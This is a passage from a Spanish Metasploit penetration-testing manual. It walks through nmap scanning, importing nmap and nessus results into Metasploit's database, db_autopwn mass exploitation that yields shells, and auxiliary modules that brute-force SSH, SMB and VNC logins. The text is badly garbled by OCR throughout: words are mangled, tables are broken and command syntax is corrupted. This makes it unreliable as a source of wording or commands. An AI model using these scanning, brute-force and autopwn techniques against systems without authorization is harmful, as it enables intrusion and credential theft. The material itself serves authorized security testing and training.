el ID de fos paquetes de fa 'méquina zombie y pueden ocatre2situaciones concretas, en primer ligt el ID se ha inecementado Capitulo I. Preliminares Eq am, nes el te ie tine ai, por el ona sD ne inerementago el puerto se encuentra cerrado, e nmap Esta herramierta, mundialmente conocida, permite al auditor explorar tos puertos abieno dokecn de ec, aver verses de procs, gern del site oper, el ons acne. aheranientseccients Japon tn prema emo Woe. ‘nmap puede sopone, 2 primera vis, wo heramiena coos de liza por su exiblidad dives en ls posblesaccons a realizar con ell. Es verdad que dspone degra cantidad parmetos, po oq seiner star algnos de inter relciado con ls tpos de exc ‘sos en ested. Tmbi, se ede recomendar el uso de inteaces ras pra liza Al denap,y deste modo simpli el enndimientoy uso de a trasent ‘ La ejecucidn de log comandos nmap se puede geneafzar meant ol siguiente esquema nmagg . La ejecucién por defect seri la signiente nmap , co la que se obtiene un seporte de la mquina con dichadireccin IF dnl se informa de Jos pert abies, servis ncontrados oe estado ce mig Para sel ecaneo por deft noes poo In informacion obtenida, a an fos diferentes paimets qu se deen aii a jen derma pag oblenerdistniosreseltados, en fincién dels tpas de escaneosvsosanerormente Deseripetin y ejemplo "Lescaneo realizar fingerprin del sistema operatvo con el objetivo de oblener la _versin de és en ia 0 las méquinas remoias, Ejenplo: nmap -O ‘Con este parimetro se anelizn qué equipos se encuentran activos en wna red a Ejemplo: nmap -sP 192.168:0.0724 : ‘Se lanza un escaneo sobre varios equipas © una ed, Permiteoblener un istado de s puerlasabiesios de ésos, Eemplo: nmap «8 192.168 0.0/24 Permite realizar un eseaneo de tipo Null Sean. Bjemplo: nmap -s¥ Permite realizar un escaneo de tipo FIV Sean, Ejemplo: nmap —sF < Pesmite realizar un eseaneo de tipo XMAS Soon. Sjemplo: nmap eX , Para indicartangos especficamas el puerto de [a Siguiente manera 80-1500, Se vealizaré un andiss desde el puerto 80 hasta} [soMetasploit para Pentesters Parimetro Deseripcién y ejemplo "Exe parimetrohabilita a deteccin del sistema operatvo, ademas dels versiones ” de servicios y del propio sistema, Ejemplo: amap ~A Permite realizar un eseaneo de po ial. Bjemplo: nmap —PO-p --sl <, Cabe destacar que Ia opeién -p ~ permite realizat ‘un escaneo sobre todos los puerias de la maquina, esta aovién puede provocar que el escaneo se ralentice en gran medida ov ‘Oblener las versiones de las productos, jemplo: nmap -s¥ Permiteexportar la informactn del andliss en un archivo XML. Ejemplo: wnap “0X =0-sV -oK archivo.zml. Con la opeién ON se puede export la informaci6n en un fiero de texto “Til 2.01 Parke pr bee Tac vad neg Hay que destcar que cuando nmap devuelve que un nimero determinado de puertos han sido Filledos, no quiere decir que determinados estén cerrados.. Cuando ef mensaje indique que el puerto se encuentra filtrado, quiere decir que esa usquina dspone de un firewall cual est filtrardo esas peliciones a cieras purlos, ienttas ques el mensaje indica que el puerto est cerrado quiere cir {que se ha abtenido respuesta de I méquine al analizar certs puettos, pero que éstos se encuentran sin ningin servicio, Existen otros estados que son lo siguientes: + Cerro el puerto es accesible pero no hay servicio en & = No filtrado, et puerto es accesibe pero no se puede devel si se euewent abirto © ccorada = Otros 2estados que indican que no se puede determinar si el puerto est abiertoofiltrado, _y si el puerta est ceradoo flrado. Ua de las operativas mis interesntes es la evasin de sistemas de deteccidn de intrusos mediante Ja fiagmentacin de ls paqueles, spoofing de direcciones MAC, sefvlos, spoofing de direcciones 1P,eteéera. Para obtener mis informacion sobre ls posibildades de aap se aconseja Ia vista y Iectura del sitio web oficial Ap. /umap.org/man/et Importacion de resultados de nmap a Metasploit Este apatado es realmente interesante ya que Metasploit permite la importacidn de los resultados obleidos con la bereamienta nmap. La utlizacén de al importacién est usa, ya que cuando se eaia un est de intasin eon gran imo de quis y aspects a tener en cuenta se deben onl todas ts. Enel libeo se ulizart el motor PastgreSI, perose pueden uiizar otto, como por ejemplo, MySQL, En primer lugar se debeté disponer de la base de datos arrancada, por lo que la primera accin & Capitulo Il, Pretiminares llevar a cabo es feterinit.dfpostgresql-.4 start, la versién puede vari en fancién de fa descarga realizada de PostgreSQL. Pueden surgi cieros aspectoso problemas que impidan la creacién de las lablas, por parte del framework. Par ejemplo, la contrasena del usuati postgres, para cammiar dich contrasefa debe ejecutarae la siguientes érdenes como se puede observar en la siguiente imagen, USAT BS AT TITS HT ould el change Airectory to °/roe sak (84.8) ine “helps for bel. estgreses alter user postgres with pasword *12%be.": RSTER nce eatgres=# Va ould not save Mistry t0 fie “/Newe/pstares/ ps history: Wo such File or Tig 20 Mail do edz el are pov cma portgre Wambo 7.0 /eae i re oaae TALE Mal crete gilt seqeee “Tost, [mn “tote cE CREATE TAME / RIN Awl create lopli ix “Dats ley” for bie “bast Ges HERE TILE wl crate SaplcHt sequence “cents sq” for serial sine vetents. is rice: este TAMLE / RUMOR WEY wl cree Septet Sen eLLnts. phy” [tone celeste” joace: nent vane wit create Implicit sequence “service ise’ for serial sg" tor seria cl Fig 20 Gone lamer co abs dis Para comprobar el estado del framework respecto ala base de dalos se puede ullizar el comando dh, status, Sito he ido correctamente se ablendr el mensaje poigresq/ conmected fo ab ipart resultadosiou at f+) impozting *huop 2" data I+) importing host 192.268.2.38 Io} Succersfutly Anparted /roct/resultadosme.xal Fea Tripoli seis de map» Mowe Uns vez se ha importado el fichero correctamente se disponen de ceros comands que inerscian ‘con la informacién almacenada como son db_host, db_ services dd. notes, entre oto. 1 comando db hoss permite realizar bisquedas y consultas sobre Ia informacidn Ue los eipos {que se encuentran importados en la base de datos. Hay que tener en cuenta, que cuando se iil na base de dalos es que se dispone de gran eantided de informacsén sobre equipos, servicios deee Metasploit para Pentesters ‘os, versiones de los servicios, eteétera. Es por ello que el comando a hasts es fundamental ara realizar consliassobvecaractersteas de algunos equipos y deimitar el rango de accibn, Los parinetos de ab hosts son los que se pueden visualzae& continoacin. Deseripein y eemplo ieaizn una bisqueds de dreciones. Ejempl: ah fw ma , Las columnas pueden ser name, as nme, | state, odes, 0. long 8p, etre | Solo msi as equpos que se enconraan atvso evans. Een: fas ‘Sevan sada a ero en formato CSV. Ej: dois -o Seta a vrable RHOSTS as maquina btenids en inqoed, Ejompio dusts -R a “an 0 Pcs ln aon [Parimeiro ‘i comando cb services permite obtener informacién sobre los dstntos servicios disponibles cn fas miquinas analizadas, puertos abierts, protocolos,etesere, Este comando dispone de fas rmismos parimetios que dB. fhsts, con el mist significado, pero adem aporta otros que aiaden foncionaldad Descripeién y ejemplo | Realiza una bisqueda por nombre de servicios. Femplo:db_services-1 neta Realiza una bisqueda por puertos. Bjemplo: dh_services ~p 139,445,338. Se devuelve la méquina que dispone de alguna de los puerto ebertas : ‘Muesira solo informacién sobre protoealo TCP 6 UDR, Kjemplo dh services =r fe J "is ZF cae nmacn vaid a sai Es importante recalear que fos pardimetros deben ser cjecttados uilizando varios la vez sara afinar las bisquedasy scare! maximo provecho de ia base de dats y el procesa de filrad solve és. Por ejemplo, ulb_services~a 192.168.1.39 -m marpe-r tp, de esa manera se et flea con mayor resticeiny seguro que el auditor consigue afinar mis su bisqueds, FE comando doles permite af auditor visualizar nolas informacion sobre los equinos. Este ‘comando dispone de un pardmero que es et ~a con el que el auditor puede realizar bisqueda de notas de equipos através de sus direeciones I, Capitulo I Preliminares = "leomando db_yunspeoites autor obtener infrmacin sobre as wineabliades que dispoen, tes equposescaneads. Ademis, se obliene in referencia de I vleratilidad por o qe se pede obtener informacién extafeilmentebuscndolaen sitios web como hp /eveamiteonghindex hl ® 6 ptr securtyfocus.com, Intogeacién de nmap con el framework ’ Metaplit apone de la posibilidad de iliza a heraenta ep de manera integra con €l4 _ramenork, Se recomend I utlzacin de nmap con Metasploit y ds de abate e ato, se ha explicado en el apartao anterior, de esta forma se puede slmacenar toa la informacin posible, © para ai después per consular cick informacion, watz Ia tenieaautpim pata probate Seguridad 6 sequins I comand para ullizar nmap en la msfennrole de Metasploit es db_nmap. Por debajo se wliliza ‘nay por lo que las opciones son las mismas. Tras I utilizacién de db_nmap, si se dispone de la conexidn con fa base de dats, fos resultados quedan almacenados en és 3. Escdneres de vulnerabilidades Los escéneres de vunerabiidades permite a auditor evaluar sistemas informiticos, equipos, rede, verifcaractualizaciones, versions, etter. Bxislen gran cantdad ce escéneres, los cuales ayudan ‘auditor realizar distinasprucbas y poder legara ciertas conclusions sobre el fans de seguridad de ane organizacin. Los eseéneresdisponen de un objetivo comin, enumerar vulnerabilidades de Seguridad en uno o mas equipos de una red u organizaién, Por oro ldo, existen dstntesenfoques «en fos esefneres de vulnerailidades, es decir, disponen de diferentes fncionalidades para x In evaiuacidn, ‘a informacidn obtenida tase enilisis de las miquinas, ees, servicios, productos, etoétera, puede servial auditor para detectarvulneabilidades conocidaso resientemente descubiertas que piesen ser explotades por un potencil alas Compatibilidad con los ficheros de informacién de eseaneres ‘A%etaspoit dispone de i posbilidad de importar archivos de eseaneos ealizados con gran eantidad de escdneres de vulnerabilidades, Esta funcionalidad aporta un nivel de integracion del framework ‘eornecon ls herramientas de seguridad que se eneventran en el mercado. ‘Les formatos compatibles con la importacién Metasploit se pueden visualiga «continuacin: + Aeuretix XM = Amap Lag + Appscan XMLMetasploit para Pentesers Burp Session XML = Core Impoct Pro XML = Poundstone Network Inventory XML = IP Address List + Uibpcap = Microsoft MBSA SeeSean XML = nCircle 1360 (XLV y ASPL) = Metasploit PI-Dump Export Metasploit Zip Export Metasploit XML ‘NetSparker XML = messus XML y NBE (vl y v2) = Nexpose Simple XML expose XML. Export Ninap Xm. Queiys Asset XML = Quays Seam Xa, = Retina XML Escdiner nessus e importacién de datos rnessus es uno de los escdnetes con mayor Hexibilidad y ulizacién en el mundo dela auditor, Es tina herramienta de ln empresa estadounidense Tenable Network Security Is cual dispone de distintas fincionalidades como son descubrimiento activo de redes,escaneo de yulnerabilidades dstibuido y polltcas de auditorias, La exporacién a ficheros de estos escaneos es una funcionalidad ny ineresante para poder exportar los resullados a Metasploit. Se pueden importar fcheros de tipo [NBE y XML creados con la hetramiena, los cuales serén importados con el comando db_import, previa conexin de la base de dats. Por otro lado, el /ramework dispone de un plugin ef cual pecnite utilizar la hervamienta nessus enc tenforno de mafconsole eincuir las resultados directamente en la base de datas de Maspoi! para ser explotados ea la siguiente fase del test de intrusion. Este plugin es cargado mediante la jecucion e a instruccién load nessus en una sesién de msfconsole Capitulo IL Pretiminares Para usar nessus se debe disponer de a herramientaregstrada,obteniendoun eddigo de actiacién es Ja siguiente URL hup:/hwwn.nessus.ory/produets/nessus/nessu-pluginsobtain-an-actvotion. code ‘Tras obtener el email con el eédigo de activacin se deve sequi as instrucciones que acompian al corre electrénico para leva a cabo el proceso de registro, Tras I ctvacién se revomena aa ‘un vsuario mediante el uso del comando nessus-adduser que e eneueata en lara /oplnessussbin, co accediendo mediante un navegador ala dieccién hups:Mocalhast: 883. retaelest 3. oe nomad Lsteg (ratlg EaGllt Search den» rot abf3nsss_ Indes) = ths vent ae +) 1 as ate: o.asnracasean seconde to bull the expos sare ine I>! suceesfoty ianedpgin; nestor, rate *Icaonectng co netp://actisttn4 as wat [91 desea Fig 2: Cap png nese» Meta, -Bxtos son los comandos més iteresanes disponibles con el plugin de nesus en Metauploit. Comando Deseripelin ressus_connect Realza la conexi6n con el servidr de ness ressus policy list | Mivestea los politicas de auditoria que se encueatran ereades| Permite realizar un nuevo escaneo de vulnerabilidades, Ujemplo nessus_scan_new resus scan_status | Mivestrael estado del proceso ressus_scan_stop | Para un escaneo en concreto que acualiente est send gjecuado rnessus_scan_stop_all_| Para todes los escaneos que se encuentran en ejecucion ressus_report_list | Lista los eportes disponibles, il para otteaer los ieatiicadores ‘Muesirainformacién sobre un report en conereto, Kjemplo:nessi IONS TSPOLES! | report_gr sidenfcador> ‘Muestra posibles exploits que pueden se: lanzados sobre In mquina resss_report_esplots | NSS [Los comandos nessus_report hosts, nessa report hos lett, nessus_report_host* | nessus_report_hast_ports proporcionan informacién detallada ai auditor sobre las miquinas, puerto, protocoos,etétera ig: Activin de es "il 2 Cons dl plain daaEe Metasploit pora Pentesters fae vain a onc ar ead wt praia ening 12. ig. 19: Conela de pics y lain leno {Ung vez conectado eon el servidor de nessa, e ha autenticado y se ha lanza el eseAner sobre un ‘objetivo, se puede almacenar ia informacién en una base de dss como se vio en el punto € map, TRE / MAY 5 ree ate nn ht he or ‘ie arn eae Wa at come Itt Smee “ie Fig 14: Ceci de aed a pars ner nirmabn de na ‘Tn lanzarelescaneo sobre el abjetivese puede recoger el report y mediante el wo de ientiFcador ‘que dispone éste realizar distintas acciones, como fveden ser listar posibles yulnrabitidades ‘encontradas en Ins maiquinas remota, oblener informacién sobre puertos abictos, potuvules dos en dichas mquinas, obtener gran detalle sobre el sistema perativo de fas mquinas reamotas y versiones de los servicios, ver que exploits esin disponibles para ser lanzados, teers, Thier Ue fom ea eae anemia ape comitet 8 Sn 1282 ead ie ot twe aniedetianieken aise igh Gai de porn Capitulo Mt Preliminares, Ea Taisen més comandos del plugin de nests, lop cuales proporsionan configuraciin bisica y, avanzada det servidor de a heramients, y todo ello desde el entorno de Metasploit. Estos comandos © pueden sails para gestonar y configura el eseénercorrectamente, pet ete proceso escapade tos abjetivos del preset iro Escéner MBSA e importacién de datos Microsoft Baseline Security Anayzer, MBSA, es una herramienta que permite las profesionales 71 y auditores determinar el estado de seguridad segin las recomendaciones de Microsoft. Con cst herramienta se pueden detectar fo errres mas comunes de ecnfiguracin en Ie seguridad de, Jos sistemas operativos de Microsofy ta fall de actualizacines en el sistema operativo que se ‘encuentran por instal, siempre hablanda de productos de fa compaia de Redmond. ‘ {te esedner dispone de una interfaz préfia y de un clente de linea de comands. El cliente de linea ® le comandas es mis verstl y proporciona un mayor nlimera de futcionaidades al auditor, Una de + 1 mis ineresane sa posible de exportar aun Fiero XML informa recog po el ssciner Este documento puede ser importado a la’ base de datos de Metasvloit directamente a través et! comand dimport, previa conexin del framework a la base de dats, Una vez el fchero ¢s imparado a base de datos se ete acedera dich informacém a tavé de fos comands de tipo <_* qu se han estudio en exe capitl, ‘ La conlusién final que debe quodar a auditor ef faciidd para imprtar los resultados de otros ssciner.a Mealy oltrationn de dicha informacion, gaia a Nexblad del emavork, parm avanzar ene ext dina ‘Técnica Autopwn La imcionalidd cop pete al auitoratomatzarel proceso de tt intrsin, El ator , realizar un ans eseaneo sobre na rey en fincén dels rela, cop, lanza une serie de exploits que cen proves a obeneién de aces emctealsistena wineroble | Autapam se apoya en una base de datos, la cual en este capitulo ss ha visto como creat y como conectar con ell, para recoger la informacién que uilizara para lanzar una cantidad de exploits con of objetivo de aprovechar alguna vulnerabildad conocida sobre Ios servicios que pueden disponet |e mquinas remotas. Si aufopwe explota alguna vulnerabilidad puede devolver el control de la "maquina remota, por ejemplo, proporcionando una sesiGn de meterpreter 0 una shell eno, El potencial que proporciona esta funcionalidad es enorme ya que se pueden utiliza fe informacién ‘eeogida con distin escdneres, por ejemplo nessus 0 nmap, uiliando la immporacién meiante archivos o incluso Ia integracin de ta herramienta con el framewerk autométicamente. Una vez clegida la manera de trabajar, aulopun realizar e esto,6 | Netspot par Pests Bl comando para interacts con la funcionalided es db_qutopwn. Hay que tener en cuenta que algunas versiones de Metasploit, e est deshabilitando esta funcionaldad, por lo que se recomienda Al auditor que tenga cuidado al atuaizael framework, sno quiere perder dicha funcionalidad. Este ‘comando dispone de los siguientes parimelros que aportan distnlos comportamientos: Pardmetro Deseripeién y ejemplo “Muestra todos fos médul de tipo exploit que se esti lanzando “Autopwn sleccions los méulos de po explou en Tancion de las posiles | vulnerabilidades encores “Autopwn selecziona los méduos de tipo exploi en fancidn de los puetos y servicios abiertos Lanza exploits contra ls objetivos marcados a Uiiliza una shell inversa cuando se eonsigue acceso > Uiiliza una shelf directa eon un puerio aleatorio por efecto 4 Deshabilita a salida de los modus de tipo exploit ‘Silo lanza los médulos que dispongan de un rank sninimo, Se debe especifiar et rank, pos ejemplo excellent ramen _ | Sélo se lanza os exploits sobre fos euipos que se encuentren en el range. Se | range | debe especiticar el rango después del parimetro -R [Excluye los equipos que se encwentren en el raugo de ser probasos mediante el Capitulo Il, Preliminares a > connect pasTgres sabe OT. W.W.T/ test ibe 3 dap 88 19.0.6,6/26 ‘Seorting Noap 3.S150N ( http: //omap.org ) at 2612-86-19 5:95 CES Rap sean report for 30. Fast is op (b,000034s Latency) Not shown: 999, closed ports on STATE SERVICE A1/tep open rpebind nap sean report Tor 100.01 3s Host is up (6.68125 Latency) 2 NOt shown: 997 closed ports PORT STATE SERVICE asytep open asrpe La6/tep open elbios-ssn 4as/tep open _alcrosoft-ds ae pares: @60:27:A4:A9:30 (Conus Computer Systens] tap con repore for 18.0.6.218 Host 19 up (6-88h}s Latency) NOt shows 367 elosed ports PORT STATE SERVICE TS/tep opehwstpe 2Ba/tep open netbLos-ssn S45/tep open mlerosoft-ds (tke Address, 69:00:27 49:43:05 (Cad Computer Systens) ip 216; Conan td a exaneo con mop [Ahora se dispone de lo necesaio para lanzar awlopwn sobre los equipos que se requier. Hay que tener en cuenta qué se necesita o lo que se requiete, por lo que no esti de més disponer cerca fos pacimetros de autopwm y decide sobre qué equipos se lanza, quia co sea necesariolanzatlo sobre {odos los equipos que farman parte de Ia red, 0 quizl se requiera slo sobre algunos de elas que Pe En {a siguiente prueba de concepto se va a realizar una conexion a una base de datos focal con Metasploit, después se ullzaré la inlegracion de nmap eon el framework para realizar un escubvimiento de méquinas sabre una red, obteniendo entre ots valores los puertos abierios Ge dichas méquinas. Por dito, se lanzack la funcionalidad autopwn con el objetivo de probar la fortaleza y seguridad de los equipos de esa red, a cuales objeta de estudio, map + Autopwn En primer lugar, tras lanzar msfconsole, se conecta el framework a la base de datos y se lanza un nmap sobre la red de estudio, La informacién de map queda almacenada en la base de dats, a evel puede ser recuperadn en cualquier instant, po si fuera necesario. Las opciones con las que nmap sa lanzado queda en manos dla imaginacin, necesidad y creaividad del auditor. tae pt om disponen de ciertos servicias y no sobre todos, Por lo que de nuevo cl auto debe eegir la mejor romps [Staats pois sdesmiqina dap picts abenes| ncn ern lt eb semester gs ———] Sra apr na pn ai gn tin eS arr e Ie PX 18:8,6,200r184) at 20 1 (S151 1 sessions): watting on 12 Launched nodes ta finish execution {1 (51/51 {sessions }}: Waiting on 9 Wunchedodules to fish execution 18 0335718 1928 ig 2 18 Otc de sin vas eon sens to. PoC: nessus + Autopwn a ls siguenteprucha de concepto se va a realizar Ia conexién con la base de datos y se utilizar ln herramientanessus para eseanear una red en busca de vunerabilidades, nessur se uilizars desde ‘nsfconsole gracias la integracin de éste cone entorno como se ha podid estudiar en este capitulo En primer lugar, se debe conectar con Ia base de datos con el comando db_connect coma se ha realizado en Ja pruebe de concepto anterior. Hay que fener en cuenta que para utilizar nessue imegrado con Metasploit se debe cargar el plugin mediante la instruccién load nessus en la sesion «de msfconsole, Una vez disponibles los comands de nessus en la sesiGn en curso de msfeonsole se ‘debe coneetar con el servdor del escner mediante el uso de nessus connect ‘Se debe tener claro qué politica se utilizara para realizar elescaneo, en este ejemplo se utilizar ‘a creado previamente en nessus cuyo nombre es msfibro. Para lanzar el escanco wilzanda ‘tn politica se wilizaré el comando nessus_scan,new ~ . fat = nasa oO #7 Hessus feliey Uist hoe eb Ap Tests 2 Prepare for FC1-0S§ nodite (section 11.2.2) 2 ternal network Sean [1 Internat etvork Sean bs ast libre > nessus scan new 1 wefed 1 kr creating seen tron pollgy meter 1 ed" and scaming 10 [+1 sean started. wid As a 935 -Saesbsocontonactetn ees? Fis; Lisa de polis y enein de e-toc nein da pl Erestaneo puede llevar bastante tiempo, en funcin defo que se compruebe. Metasploit no bloquea. ln sesiin de msfconsote, lanza et proceso en segunda plano y en cualquier momento se puede ‘omprobar en qué estado se encuentra el escaneo con el comando messus_ scan stats Capitulo I. Preliminares a) 1 sce cet ce ‘seamen 1220 Infrae soe aad de prot neds nea op pros ee dl prt I tse de spe zr et comanlo resp ged mor La pti dando dsc (Eintanact eee dings eel peo ybwenteanjecaynpetrapiet ef" ang Wate 0 3d Fig2.21: Inte dred de poe dena Este es un buen momento para reftescar fos comandos db, hosts, db_services, db_vulnsy ojea informacion qu se cispne en Is bse de datos. Una vez que et aubior est prepara para ln ‘anvopwm y cea que éste puede tener éxito sobre los equipos remota, se lanzaré la funcionalidad contra fos equipos ig 22 Obi eines con ope,EE Macplitpora Pentatrt 4, Escaneres dirigidos a servicios ‘A veces puede ser realmente interesante pata el auditor cents en uno o varios servicios concretos ¥ obtener Ia maxima infarmacién de ellos que se pueda. En este apartado se van a estudiar hnetramientas que edisponen en el framework que tienen por objetivo el especificado anteriores El objetivo Bs realmente impostane conocer ls versiones de ls products y el estado de sos, Hoy en da una conigurci por defeeto © una msl configaraisn tambien pueden ser signos de posibles problems de seguridd graves, Bs certo que cuana ds informacion se dispongs de objetivo, las sibldades dedi ex el et de inusinamenian, Uns vez que se dispane de este tipo de informacion, que puede ser mis ii de lo que « priori a cualquier usuario, ineuido los adminstradores, les pueda parecer es posible realizar la bisqueda de exploits para las versiones de los productos localizados en el andlisis del entorn. Google, conocido por todo usuario de interne, es uno de ls mayores buscadores de exploits al que se puede acceder.Simplementerealizando bisquedas con palabras migicas como exploit se pueden oblener resultados srpreadentes, consiguiendo por supuest el exploit que se requiere, Pero esto es una préclica que un usuario de Inte realizar ane una bisqueda requerida de cualquier cosa. ‘Otras fuentes interesantes sobre exploits con grandes bases de datos son: = hup:/ivwmexploitdt.com. La cual proporciona gran cantidad de informacién sobre ‘exploits organizados por categorias como locales, remotos, web, etStera. Como curiosiad indicar que en algunos exploit se proporciona también el ejecuiable de Ia version del ‘producto vulnerable. También disponen de una direccin para descargar exploits esritos por ‘Metasploit directamente,htp:/ivwvs exploit-db.com/author/?a=321I = up: fpacketstormsecurityorg. Otra de ls grandes referencias en sitios web de seguridad ‘Actualizacindiaria de exploits cn toda la informacion dtallada sobre las vulnerabilidades, ~ hp:thvw-securityfocus com. Siempre acualizada y con la informacién detallada, un sitia web que no puede falar en los favoritos de nadie, Reconiendable el uso de sus listas pra estar siempre informado. Herramientas auxiliary en Metasploit Metasploit dispone de cistiniosmdulos de tipo auxiliary con los que se puede obiene diversa infoacin sobre servicios y mquies remota, Ba este apatado © muestra algunos ejemplos ‘de cdo obtener nfomacin vlios realizando una serie de pushes sore los servicios remo Para empezar se exponen 2 médulos que ayudarin al auditor a obtener la versi6n de un servidor FTP remoto. La primera herranienta 0 médulo que se ulliza es auilaryscannerdipfip_version. Copltulo I. Preliminares i ‘a configuracin es realmente sencilla, se indica el FTP remoto en lavariable RHOSTS, el pueto por el que escucha el FTP, it outing. wrseah > ig 2-2; Osean de vin un aor FY (oir herramienta que ve puede ular es auxiiaryseannerfpfanonymous con la que niediane ef so del usuario andnimo se puede detectar la versin del servidor FTP Listen distinios médulos auxiliary para el servicio SSH, El prnnero que se explica permite ‘blener de manera répida la versin del servicio remot, La ruta de asta herramien es cil” scannersshlsh_version y es bastante sencllo de configura, se indie la maquina remota y se lazy el nodule. Fat SoU gL > ase anaes eT jst auelLiay(esh verstan) > ra +) aus. me.s.n2, 5 server verson: Ss (+) Seamed 1 of 1 toss (1008 eonplete. is) nuxitiary route execution eopleted lit anstiaryashversioe) > i224 Desi de veri downoad SS opens 5.192 shan Existen ota herramientas muy interesantes para realizar fuerza brata sobre el servicio SSH. La primera se encuentra en la ruta uailiaylscanmer/shissh_fogin y permite realizar (verze bruta & cuentas de usuario que se puedan entrar en el sistema mediante autetiacién de ogin y password. ‘Acste médalo se le puede configurar un diccionario de claves y una sta de usuarios ei probando las posibes combinaciones. Adem, comprobark la posbilidad de autenticarse en el sistema con clave en blanco, una mala configuracin en un servidor. La segunda beramenta se enevenra en Ia ruta cular scannerfsshssh yperate realizar fuereabruta a usuarias que se autentiquen mediante 1uso de cerificados. En ottas palabras, se dispone de una clave privads,oblenda de alin modo, posiblemente fraudulent y se va probando con os distints usuarios que se especifiquen. El sewvicio SMB, Server Message Block, también dispone de herramientas con las que se puede ‘obienerinformacién cil para poder ulilizarlas durante el ataque. En la ruta aualianyscamner/smb/ smb, versions dispone de uo escéner eon el que se puede detect le versign de sistema operativo Ande se encuenisa el servicio SMB, Si Metasploit estuviera conecado a la base de datos, los resultados oblenidos de eslos esclneres actualizariaa los valores de dicha base de datos, Le prueba se puede realizar de a siguiente manera: ta lanar ef escdnerse puede realizar wie Consulta, por cjemplo con la instrucciéa.db_hass -€ nameos_sp, address. Se prede anexar més °farnnas en Fanci de ls informacion que s quiere recupear de la base de datos.Ba Metasploit para Peniesters aaa niin Ta SARS ae aS RT TAT TTT sree te etl Iie eras stess ge or con jectier 1 i ne een he hres atin eaten he sour cnearen treat 4004s weg Wns Service Pak 3 aguage: Spe oem. ie ier “ramy : : 1 Sceed a3 ets (08 coheed Fig2.25: Deen de vein de dons opera) SM ste tipo de escneresorientndos a un servicio eonereto son mis sienciasos que los escdneres que analizan un gran nimeto de servicios 0 recursos, por fo que si se necesita evitar un aélisis masivo Yy ruidoso, ests bercamientas son esenciales, nla ruta auiior/scannerdmbysmb_login se encuentra ts apicacién que permite realizar wna prueba de fuerza bruta sobre el protocolo SMB. Se le puede especificar un fchero coa usarios ¥ eontrasetas,configurarie para que se comprucben los passwords en blanco, nombres de usuario tlizados como contraseias,etectera. Ademés, si Metasploit se encuent coneetado a ana bese de datos este médulo registrar en ésta los login satsfatoris y sobre qué mjuinas ocutieron, Dicestamente también ac puede proba: cum usuario y contrasena, y por contraseRa también se entiende un hast LM y NT. irs herraenta para obtener infpmacia sobre el servicio SMB es esuiiarvscanner/onien_ emumsares, la cualpermite determinar que recursos eompartios son proporvionadis por SMB en luna. 0 en on conjunto de méiquinas remotas. La herramienta usilianyscannerdsmbismrb emuanusers «leernina que usuarios locales existen en la miguina remote, Para el servicio VNC se dispone de las herramientas auiliarydscammer’mcime login yauciliary” seannerivactne_none_outh. La primera realza un slaque de fuerza brute sobre un servicio VNC, como en ls anteriores herramientas se le puede pasar un fchero con usuarios, conrasefs, prueba de contrasefias en blanco, etcétera. La segunda hentamienta permite saber si un servidor VNC Permits i autenicacion sin contraselia, Puede parecer extriio encontarse con algo asi, pero tn tala configuacia, un servo olviado en el enor un fll po parte de un anata pede levar a esta stuacién, ‘xiten gran cantidad de herramientas para muchos servcis, simplemente se debe buscar en arate ‘usliony/scanmer. Herramientas para HTTP, MySQL, netbios, NFS, Oracle, Postgres, SAP, STP, ‘SNMP, etetera, Como se puede ver Metasploit proporciona gran canidad de pequenas wilidades para realizar una exploracin y anlisis de servicios sin despleparruido sobre el enlorno, Capitulo IM_Et arte de ia inrusin Capitulo 1 El arte de la intrusion 1, Ambito presente capitoloexplica la fse de expltacénde vunerbiiades mediante lwo de Metasploit n esta fase el auditor, tas analizar la informacién obtenida y las posibles vulnerbildads -eacontradas, lanzaré uno 0 varios exploits con el objetivo de lograe acceso a un sistema informatica remo 0 informacién a ln que no tiene wn eso autorizado, ‘ Esta fe necesita qe ol autor dsponga del fromeworkaeualzado con exploits reciente, fosy cues pueden ser obtendas.a través de Internet. Cuanto mayor nimero de exploits recientes se tenga ims posiildadesexisten de disponcr de la lave que proporcione el éxito en el test de intusién, ‘ Ademés, e debe estar informado sobre las vulnerabilidades que aparecen ditriamente sobre los sistemas, ya que esto puede ayudar a cneontrar pequefios agujeros en los mismos, aunque se A ceneventren actualizados casi dariameate, La elec del payioud es algo fundamental y etic ala hora de restza Ia explain de wn sistema, El auditor debe elegi el context en el que se moverd es decir si uilizrk un payload para fa fase de postexplotacién,o por el conaro, le basta con conseguir un shel sobre un sistema € oncreo y demostrar fa vulnerabildad del sistema. Existe gran varedad de funcionalidades base & para tos payloads, las cuales podrin estudiarae en el presente capitulo. Por otro lado, hay que comentar que ia explotscén de un sistema puede ir acompatado de lg interacién de un usuario con el atacante, por ejemplo através de una conexién an servidor web, la no interac de Iveta cow el atacante. Por ejemplo un ustaio no dispone de wn servicio clulizado o correctamente configurado. Es bastante IOgico, yasise entiende que un ataque sin inferno dela victima provoca mayor temor por pate de los usuaos, pero hay en dia es igual de Fuctible y temibie un ataque con interacién, ya que un usuario nonnal utiliza Finks para aceeder @ riuchainformacin en su diaa dia, y som aquelios links Tos que pueden llevare a cualquier Ingar de Jnleret inesperado, por ejemplo un servidor web que lance exploits sabre el equipo de l vctma. 4 Por itimo destacar, que en muchas acasiones fa explotacidn de vulnerablidades puede lega a ser ‘rustrante, ya que puede parecer que no se encuentra Ia via de acceso para realizar la exploiacin, ‘© que incluso no existe un exploit que aproveche esa via. Se recomienda a fo letores que tengan64 | Metasploit para Pentesters Paciencia, eslicen un estudio y auiisis de fs sistemas exhaustive y que en muchas ocasiones ‘camino mis corto hacia e! objetivo no es el mejor, y estudiando un camino allerativo se puede ogra mayor éxito en el test de intusin.. Como ejemplo prctico se indica el siguiente: se debe probar la seguridad de un equipo con Windows 7. y se dispone de conectividad directa desde el equipo del auditor, pero por mucho que se lanzan exploits no se logra vulnera el equipo. Tras analiza el segmento en el que s© localiza el equipo objetivo, se encuentran equipos con sistemas operaivos Windowy AP, los cuales se detecta que son vulnerabes Trasaprovechar estas vulnerabilidades son contolados remotameate, ye puede obtener informacion valiosa de ello, como por ejemplo, un istado de usuarios y hashes, i si esos usuarios se encuentran en el equipo con Winslows 7? Ya se dispondria de acceso al eipo objetivo, No se ha utlizado et ‘amino mis coro, pero por un camino alternativo se ha obteido el éxito en fe prueba de intrusin, 2. Payloads ‘Los payloads son uno de fs protagonisias de este libro y de los lest de intrusign. Elles aportan el éxito oe facaso en muchas de las pruebas que se pueden realizar en el proceso, Son la esencia del ‘lagu, la semilla que se ejecua en el interior dela maquina remota y proporcionar al atacante @ auditor el poder de controlar el sistema removo, Eistendistintos tipos de puyloade como son los singles, slagersy staged. Esos diferentes tipos permiten gran veralildad y pueden ser de gran uildad 